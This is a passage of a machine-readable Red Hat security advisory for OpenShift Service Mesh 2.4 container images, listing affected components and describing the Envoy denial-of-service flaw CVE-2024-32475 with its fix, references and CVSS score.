"8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, ], }, vulnerabilities: [ { cve: "CVE-2024-32475", cwe: { id: "CWE-617", name: "Reachable Assertion", }, discovery_date: "2024-04-19T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2276149", }, ], notes: [ { category: "description", text: "A flaw was found in Envoy, a cloud-native, open source edge and service proxy. When an upstream TLS cluster is used with \"auto_sni\" enabled, a request containing a \"host/:authority\" header longer than 255 characters triggers an abnormal termination of the Envoy process, leading to a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-32475", }, { category: "external", summary: "RHBZ#2276149", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276149", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-32475", url: "https://www.cve.org/CVERecord?id=CVE-2024-32475", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-32475", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-32475", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382", url: "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj", }, ], release_date: "2024-04-18T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:22:37+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7724", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", 